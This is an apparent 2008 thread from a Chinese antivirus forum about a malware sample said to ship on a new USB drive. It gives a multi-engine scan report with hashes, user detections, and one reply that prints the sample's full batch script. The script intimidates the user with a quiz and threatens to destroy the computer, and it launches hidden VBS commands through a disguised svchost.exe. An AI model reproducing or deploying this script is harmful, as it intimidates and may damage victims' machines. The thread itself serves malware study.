查看: 4660|回复: 21
收起左侧

[病毒样本] 新买4G U盘自带过主流杀软

[复制链接]
guoshu520
发表于 2008-11-20 21:50:22 | 显示全部楼层 |阅读模式
没加密的~自己小心
VirSCAN.org Scanned Report :
Scanned time   : 2008/11/20 21:44:21 (CST)
Scanner results: 23%的杀软(9/39)报告发现病毒
File Name      : HERO.rar
File Size      : 316409 byte
File Type      : RAR archive data, v1d, os
MD5            : 44cd5ea71ae6fcd56cddf6cc14de17d8
SHA1           : 453b466b73b6f0fe90e3bc88daed15cf14df3474
Online report  : http://virscan.org/report/db3e724b1dfec4a3db8dbe420d2e7e9a.html
Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      4.0.0.26        20081120040128    2008-11-20  3.94   Virus.Win32.Trojan!IK
安博士V3       2008.11.20.04   2008.11.20        2008-11-20  1.02   -
AntiVir        7.9.0.34        7.1.0.114         2008-11-20  1.64   HEUR/Malware
安天           2.0.18          20081120.1720324  2008-11-20  0.17   Trojan/Win32.VB.hud[Downloader]
Arcavir        1.0.5           200811161554      2008-11-16  1.61   -
Authentium     5.1.1           200811200124      2008-11-20  1.37   -
AVAST!         3.0.1           081119-0          2008-11-19  0.12   Win32:Trojan-gen {Other}
AVG            7.5.52.442      270.9.8/1800      2008-11-19  2.09   BAT/Worm.C
BitDefender    7.81008.2229698 7.21963           2008-11-20  2.47   -
CA (VET)       9.0.0.143       31.6.6219         2008-11-20  8.60   -
ClamAV         0.94.1          8653              2008-11-20  0.28   -
Comodo         2.11            2.0.0.712         2008-11-20  1.18   -
CP Secure      1.1.0.715       2008.11.20        2008-11-20  6.79   -
Dr.Web         4.44.0.9170     2008.11.20        2008-11-20  3.99   -
ewido          4.0.0.2         2008.11.20        2008-11-20  7.93   -
F-Prot         4.4.4.56        20081120          2008-11-20  1.32   -
F-Secure       5.51.6100       2008.11.20.10     2008-11-20  0.89   -
飞塔           2.81-3.117      9.723             2008-11-19  0.87   -
GData          19.1593/19.114  20081120          2008-11-20  6.41   Win32:Trojan-gen {Other} [Engine:B]
ViRobot        20081119        2008.11.19        2008-11-19  1.99   -
Ikarus         T3.1.01.45      2008.11.20.71887  2008-11-20  3.75   Virus.Win32.Trojan
江民杀毒       11.0.706        2008.11.19        2008-11-19  1.81   -
卡巴斯基       5.5.10          2008.11.20        2008-11-20  0.38   -
金山毒霸       2008.9.8.18     2008.11.20.17     2008-11-20  4.52   -
迈克菲         5.3.00          5439              2008-11-19  2.84   -
Microsoft      1.4104          2008.11.20        2008-11-20  6.16   -
mks_vir        2.01            2008.11.17        2008-11-17  3.33   -
Norman         5.93.01         5.93.00           2008-11-19  5.23   -
熊猫卫士       9.05.01         2008.11.19        2008-11-19  5.71   -
趋势科技       8.700-1004      5.664.05          2008-11-20  0.15   Mal_Otorun1
Quick Heal     10.00           2008.11.20        2008-11-20  1.19   -
瑞星           20.0            21.04.32.00       2008-11-20  1.22   -
Sophos         2.80.0          4.35              2008-11-20  2.26   -
Sunbelt        4474            4474              2008-11-04  1.27   -
赛门铁克       1.3.0.24        20081119.017      2008-11-19  0.25   -
nProtect       2008-11-20.00   2625078           2008-11-20  4.09   -
The Hacker     6.3.1.1         v00159            2008-11-19  0.48   -
VBA32          3.12.8.9        20081119.0840     2008-11-19  2.11   INF.Autorun.gen
VirusBuster    4.5.11.10       10.93.8/672009    2008-11-19  1.78   -

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
guoshu520
 楼主| 发表于 2008-11-20 21:52:05 | 显示全部楼层
没加密的~自己小心
cuixin000000
发表于 2008-11-20 21:54:07 | 显示全部楼层
ESET NOD32报C:\Documents and Settings\cuixin\桌面\HERO.rar > RAR > Town.dll > RAR > autorun.inf - INF/Autorun.gen 特洛伊木马
Palkia
发表于 2008-11-20 21:56:49 | 显示全部楼层
rs 0
wangjay1980
发表于 2008-11-20 22:22:20 | 显示全部楼层
什么乱七八糟的
kiwis
发表于 2008-11-20 23:09:28 | 显示全部楼层
小红伞挡住了
浪滔天
发表于 2008-11-20 23:29:46 | 显示全部楼层
@echo off
set hero=%systemroot%\ime\HIDESE~1
color 0a
echo.
echo.
echo ?            ======================================
echo                              警    告
echo               ======================================
echo ?
echo ?                  MY GOD!你中毒了,非常不幸!
echo ?
echo               以下内容关系着你的电脑安全务必仔细阅读
sleep 1000
echo.?
echo.?
echo ?            1、不要关机或重启否则你将无法开机(切记)
sleep 3000
echo. ?
echo ?            2、不要怀疑第一条否则我保证你会Very后悔
sleep 3000
echo. ?                     
echo               3、你只需回答些问题,答对2题PC就OK否则KO
sleep 3000        
echo.                     
echo               4. 切记:不要关机或重启否则你将无法开机
sleep 2000
echo.
echo.
echo                    ------ 冒险马上开始 ------
sleep 2000            
cls
echo.
echo.
echo.
echo                用你聪明的头脑思考,写出心中的答案。
sleep 1000
echo.
echo                如果你的试卷能及格,我将删除自己。
sleep 1000
echo.
echo                如果你的试卷是零分,我将破坏你的计算机。
sleep 1000
echo.
echo                另外我必须说,我只能把10分钟的时间留给你。
echo.
sleep 1000
echo                现在你无法逃避,你已经无法上网查找信息。
sleep 1000
echo.
echo                开始吧,容不得犹豫。我已经打开了计时器。
echo.
sleep 1000
echo                                   5
sleep 1000
echo                                   4
sleep 1000
echo                                   3
sleep 1000
echo                                   2  
sleep 1000
echo                                   1




set grade=0
:Q1
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题1---------------------
echo.
echo.
echo  “圐圙”这两个字的正确读音是:                           
echo ?            
echo    A. sifang bamian  
echo. ?
echo    B. fang lun   
echo. ?
echo    C. ku lue   
echo. ?
echo    D. leng lue
echo.
echo. ?
set /p ask=  请输入答案(A,B,C,D),然后回车:
if /i "%ask%"=="c" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q1




:Q2
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题2---------------------
echo.
echo.
echo  “T囧T”这个表情的正确含义是                           
echo ?            
echo    A. 垂头丧气
echo. ?
echo    B. 鄙视你   
echo. ?
echo    C. 俯卧撑  
echo. ?
echo    D. 装傻
echo.
echo. ?
set /p ask=  请输入答案(A,B,C,D),然后回车:
if /i "%ask%"=="b" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q2





:Q3
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题3---------------------
echo.
echo.
echo  为什么卫星不会撞到星星?                           
echo ?            
echo    A. 轨道不同
echo. ?
echo    B. 地球引力
echo. ?
echo    C. 星星会闪   
echo. ?
echo    D. 它想造反咩?
echo.
echo. ?
set /p ask=  请输入答案(A,B,C,D),然后回车:
if /i "%ask%"=="c" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q3





:Q4
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题4---------------------
echo.
echo.
echo  “I MISS YOU”的演唱者是?他还有一首歌叫“绝不放弃”。                           
echo ?            
echo    A. 刘德华  
echo. ?
echo    B. 罗百吉   
echo. ?
echo    C. 光  良   
echo. ?
echo    D. 杨  坤
echo.
echo. ?
set /p ask=  请输入答案(A,B,C,D),然后回车:
if /i "%ask%"=="b" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q4






:Q5
cls
set ask=
echo.
echo. ?
echo.
echo  ----------------问题5---------------------
echo.
echo.
echo  下面最不可能是猫扑常用回帖用语的是:                           
echo ?            
echo    A. 强制插入
echo. ?
echo    B. 楼主是火星人 鉴定完毕   
echo. ?
echo    C. 马克   
echo. ?
echo    D. 此广告位招租
echo.
echo. ?
set /p ask=  请输入答案(A,B,C,D),然后回车:
if /i "%ask%"=="c" set /a grade=%grade%+1
if /i "%ask%"=="" goto Q5


            


cls
if "%grade%"=="0" goto Kill
if "%grade%"=="1" goto Kill
goto SelfKill


:Kill
cls
echo ?
echo ?
echo               你的成绩是%Grade%分,不及格
echo ?            不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo ?            不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo ?            不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo ?
echo ?
echo ?
echo ?
echo ?                     
echo                那么,就按照契约,毁灭你的计算机吧!!!!!
echo On Error Resume Next>Kill.VBS
echo set wsc=wscript.createobject("wscript.shell")>>Kill.VBS
echo wsc.run "%hero%\svchost.exe /c %hero%\hero.bat -Kill",0 >>Kill.VBS
start Kill.VBS

:Kill20
cls
echo ?
echo ?
echo               你的成绩是%Grade%分,不及格
echo ?            不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo ?            不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo ?            不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo ?
echo ?
echo ?
echo ?
echo ?                     
echo                那么,就按照契约,毁灭你的计算机吧!!!!!
pause>nul
goto Kill20


:Selfkill
echo ?
echo ?
echo                 您的成绩是%Grade%分,及格了。
echo ?      谢谢您完成了这套试题。5秒钟后,我将按照契约,删除自己。
echo ?               希望您能够过得愉快,再见。
echo ?
sleep 5000
echo On Error Resume Next>KillSelf.VBS
echo set wcs=wscript.createobject("wscript.shell")>>KillSelf.VBS
echo wcs.run "%hero%\svchost.exe /c %hero%\hero.bat -Killself",0 >>KillSelf.VBS
start KillSelf.VBS
Exit


亲爱的MM/GG:

    你好。首先,让我对此病毒给您带来的
不便向您道歉。

    病毒已经从你计算机中清除,系统将在
重起后恢复正常状态。感谢CCTV.MTV.TVB.
ABC.CCN.VOA以及奋战在杀毒前线的你,好运!

    世界上最远的距离不是天崖海角,而是
我在你面前你却不知道我仍然爱你,互相冷
若冰霜的我们已经伤害对方太深。如果上天
再给我一次机会,我仍然会选择你,即使我
知道我们非常之不合适。但是,爱需要理由吗?
   

                         BY 爱你的我                              
                        

确实有点乱七八糟。。。
leonfg
发表于 2008-11-20 23:32:04 | 显示全部楼层
这个是毒吗...
tiancai2nd
头像被屏蔽
发表于 2008-11-20 23:33:46 | 显示全部楼层
恶搞小程序
FantasYang
发表于 2008-11-20 23:41:29 | 显示全部楼层
呃…我及格了……
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-15 18:01 , Processed in 0.233618 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表